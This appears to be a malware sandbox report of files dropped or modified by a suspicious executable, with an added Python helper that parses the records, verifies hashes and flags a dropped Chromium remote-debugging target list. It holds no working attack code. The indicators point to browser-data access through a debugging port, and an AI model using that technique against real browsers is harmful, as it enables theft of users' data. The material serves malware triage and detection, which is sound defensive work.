                                                                                                                                                                      SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                      MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                      SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                      SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                      SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):9571
                                                                                                                                                                      Entropy (8bit):5.536643647658967
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                      MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                      SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                      SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                      SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                      Process:C:\Users\user\Desktop\Ttok18.exe
                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):1058
                                                                                                                                                                      Entropy (8bit):5.356262093008712
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                                                                                                                                                      MD5:B2EFBF032531DD2913F648E75696B0FD
                                                                                                                                                                      SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                                                                                                                                                      SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                                                                                                                                                      SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X
                                                                                                                                                                      Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1787
                                                                                                                                                                      Entropy (8bit):5.38342112239446
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:SfNaoCtzTECIfNaoCkCSfNaoCJCMfNaoC7GT0UrU0U8C7+:6NnCtzTECUNnCkC6NnCJC4NnCu0UrU03
                                                                                                                                                                      MD5:F383E5379A83CC209E37A893BE99B5ED
                                                                                                                                                                      SHA1:CC9D2FB9E8931A37CEFA96697B09E7A7D8914258
                                                                                                                                                                      SHA-256:7D79E291347C08D33FF3FC013C002E86D8067B4B6EF9E534C17B73FCEA4830E7
                                                                                                                                                                      SHA-512:8509E1845253115C77F2EE03331B57F38BDB19751E77D5230E4F78E46E3EA646B322935082B20F3FE83447B42B201963F0D3F123D91A13D494192BFCD07FFB40
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/2C2CD0CB75C419D746861E3EEC8EEBB8",.. "id": "2C2CD0CB75C419D746861E3EEC8EEBB8",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2C2CD0CB75C419D746861E3EEC8EEBB8"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/305BD73A88D01DB3AB7CC166E81CB9DC",.. "id": "305BD73A88D01DB3AB7CC166E81CB9DC",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/305BD73A88D01DB3AB7CC166E81CB9DC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:@...e...........................................................
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
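The records above are the raw material for two routine analyst tasks: pulling indicators out of a sandbox report, and checking bytes recovered from a host against what the sandbox saw. The Python below is an added example written for this page, not code from Joe Sandbox or from the report. SAMPLE copies the field lines of three records shown above (the CSV the sandbox marks Malicious:true, the dropped JSON DevTools listing, and one PowerShell AppLocker test file) with their previews shortened; the byte strings used to exercise the entropy and hash helpers are constructed inputs. The DevTools check is a heuristic of my own: a ws://localhost:<port>/devtools/ URL in a dropped JSON file is the target list a Chromium browser serves on its remote-debugging port, so the port number is worth recording alongside the process that wrote it.

```python
"""Triage helper for 'Dropped Files' records in the layout used on this page.

Added example, not part of the Joe Sandbox report. SAMPLE copies field lines
from three records above (previews shortened); the bytes fed to the helpers
in usage are constructed test inputs, not recovered files.
"""
import hashlib
import math
import re
from collections import Counter

# One field per line in the order the report emits them; a new record
# starts at every 'Process:' line.
FIELD_RE = re.compile(
    r"^(Process|File Type|Category|Size \(bytes\)|Entropy \(8bit\)|Encrypted|"
    r"SSDEEP|MD5|SHA1|SHA-256|SHA-512|Malicious|Preview):(.*)$"
)
# A Chromium DevTools target listing (GET /json on the remote-debugging
# port) carries one of these URLs per tab or extension page.
DEVTOOLS_WS_RE = re.compile(r"ws://localhost:(\d+)/devtools/")

SAMPLE = r"""
Process:C:\Users\user\Desktop\Ttok18.exe
File Type:CSV text
Category:modified
Size (bytes):1058
MD5:B2EFBF032531DD2913F648E75696B0FD
SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
Malicious:true
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0 (shortened)
Process:C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
File Type:JSON data
Category:dropped
Size (bytes):1787
SHA-256:7D79E291347C08D33FF3FC013C002E86D8067B4B6EF9E534C17B73FCEA4830E7
Malicious:false
Preview:[ {.. "description": "",.. "id": "2C2CD0CB75C419D746861E3EEC8EEBB8",.. "title": "Google Network Speech",.. "type": "background_page",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/2C2CD0CB75C419D746861E3EEC8EEBB8" (shortened)
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
"""


def parse_records(text):
    """Turn the flattened key:value dump into one dict per dropped file."""
    records, cur = [], None
    for raw in text.splitlines():
        m = FIELD_RE.match(raw.strip())
        if not m:
            continue  # blank lines and anything that is not a field
        key, value = m.group(1), m.group(2).strip()
        if key == "Process":
            cur = {}
            records.append(cur)
        if cur is not None:
            cur[key] = value
    return records


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte, the scale of the report's
    'Entropy (8bit)' field: 0.0 for constant bytes, 8.0 for a uniform
    spread over all 256 byte values."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def digests(data):
    """Upper-case hex digests, matching the report's notation."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def verify(record, data):
    """Compare bytes recovered from disk with a report record; returns the
    names of the fields that disagree (empty list means a full match)."""
    mismatches = []
    if "Size (bytes)" in record and int(record["Size (bytes)"]) != len(data):
        mismatches.append("Size (bytes)")
    for field, value in digests(data).items():
        if field in record and record[field].upper() != value:
            mismatches.append(field)
    return mismatches


def triage(records):
    """Findings worth a second look: files the sandbox flagged, and any
    dropped JSON that is a DevTools target list (the port tells you how
    the browser was started for remote debugging)."""
    findings = []
    for rec in records:
        if rec.get("Malicious", "").lower() == "true":
            findings.append(("flagged malicious", rec.get("SHA-256", "?")))
        m = DEVTOOLS_WS_RE.search(rec.get("Preview", ""))
        if m:
            findings.append((f"devtools target list on port {m.group(1)}", rec["Process"]))
    return findings


if __name__ == "__main__":
    for reason, ident in triage(parse_records(SAMPLE)):
        print(f"{reason}: {ident}")
    print("entropy of 64 x 'A':", shannon_entropy(b"A" * 64))  # constructed input
```

In use, `parse_records` is pointed at the whole Dropped Files section and `verify` at a file pulled from the infected host; a non-empty mismatch list means the artifact on disk is not the one the sandbox hashed, which is common for logs and browser databases that keep changing after the run. The entropy helper reproduces the report's scale so a locally recovered file can be compared to the listed 'Entropy (8bit)' value.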
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):55
                                                                                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (4457)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):4462
                                                                                                                                                                      Entropy (8bit):5.804398259918102
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:YLJAliDIN6666VY4kWIoJ4FMgkSoJzL921oSeokAKrixIgqffffffL:Y0vN6666VY4fI4SBpELEeOU7
                                                                                                                                                                      MD5:AE758E551E34D9E9383944395BB13317
                                                                                                                                                                      SHA1:350AA97096AABC18A42CD6D4CBECC02C0337F857
                                                                                                                                                                      SHA-256:14A0E24572BE4120C37108A491576C6CC9292FD40C1854975E201B22463B823F
                                                                                                                                                                      SHA-512:3707C9F16728F8993B625F25C5505BF7B3A4702EF670B7E9FF2B637628DFDEAD981B598F85566E4B6CF1FBA859E081C27EF176311B3EFA6BA45C2395369705A5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                      Preview:)]}'.["",["path of exile early access classes","surviving barstool cast","princess cruises man overboard","spotify wrapped 2024 artists","trevor lawrence texans","playstation ps5 30th anniversary","china bans exports","skeleton crew star wars"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"Cg0vZy8xMXM1NzVfbWhwEhFUZWxldmlzaW9uIHNlcmllczKTFGRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBUUFNQklnQUNFUUVERVFIL3hBQWJBQUFDQXdFQkFRQUFBQUFBQUFBQUFBQUVCZ01GQndJQkFQL0VBREVRQUFFREFnUUZBd1FBQndFQUFBQUFBQU
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                      Entropy (8bit):3.9353986674667634
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                      MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                      SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                      SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                      SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                      Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):134253
                                                                                                                                                                      Entropy (8bit):5.441529892000257
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:fbkX33ov7GsG688fJbk/5xnsPLWjwR2i6o:fs3lr6t2/5xnsPawR8o
                                                                                                                                                                      MD5:639AEFC048D1BE1731F903208B1711B4
                                                                                                                                                                      SHA1:73F3ADAB0D34EC58B425A63A79B042188278F4F9
                                                                                                                                                                      SHA-256:2054CBCA8EEA847E6FB52484A32752A41165EA72180FBB6357ED852BF815D75E
                                                                                                                                                                      SHA-512:01E4F5DF8C78E96CEEB9CBB8853E4F007C15550FA779C9B879CA64AEC3950248B9C9B21BF17539D6AF3D58F706DE8F8BF844C101E5A663B6354DCB9F106ACDFC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                      Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):5162
                                                                                                                                                                      Entropy (8bit):5.3503139230837595
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                      MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                      SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                      SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                      SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
